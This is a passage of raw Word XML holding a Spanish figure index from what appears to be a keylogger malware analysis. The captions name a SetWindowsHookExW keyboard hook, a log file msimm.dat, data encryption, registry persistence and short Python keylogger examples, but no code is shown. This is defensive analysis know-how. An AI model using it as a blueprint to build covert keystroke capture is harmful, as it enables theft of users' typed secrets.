          <w:t>7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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 89. Sección donde crea el Mutex para evitar llamar el hilo del keylogger más de una vez.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358228 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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29" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 90. Función que crea el hilo del proceso del keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358229 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 91. Muestra de código modificado para forzar salto a la zona del keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358230 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 92. Llamada a SetWindowsHookExW</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358231 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 93. Llamada SetWindowsHookExW que establece función de hook para teclado.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358232 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 94. Muestra inicio hook de proceso de pulsaciones de teclas: keyboard_event_hook</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358233 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 95. Bucle de proceso de mensajes del keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358234 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 96. Zona de código donde crea el fichero “msimm.dat” en el disco.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358235 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 97. Zona de memoria donde se muestra el string msimm.dat</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358236 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 98. Zona de código que establece cadena “KSL0” en memoria.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358237 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 99. Código que realiza escritura en fichero de disco.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358238 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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39" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 100. Llamada al siguiente hook de la cadena.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358239 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 101. Sección del cifrado de datos del keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358240 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 102. Muestra de formateo de fecha y hora y obtención de nombre de ventana activa.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358241 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 103. Funciones de conversión de tiempo.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358242 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 104. Muestra de cadena de texto formateada con datos del sistema.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358243 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 105. Grabación de datos del keylogger en el fichero en disco.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358244 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 106. Copia de teclas virtuales sobre buffer de memoria.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358245 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 107. Funciones de detección de tipo de teclado y mapeado de teclas.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358246 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 108. Zona de memoria donde se hace referencia a un archivo o carpeta llamado SPUNINST</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358247 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 109. Ejemplo de código más corto de keylogger en Python.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358248 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8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49" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 110. Ejemplo de keylogger en ocho líneas de código usando librería pynput.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358249 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 111. Muestra ficheros de texto generados por los dos ejemplos de keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358250 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 112. Parámetros de línea de comandos de Demon’s Eye Keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358251 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 113. Muestra de keylogger replicado y añadido al registro de Windows.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358252 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 114. Muestra del contenido registrado en el fichero de datos del keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358253 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
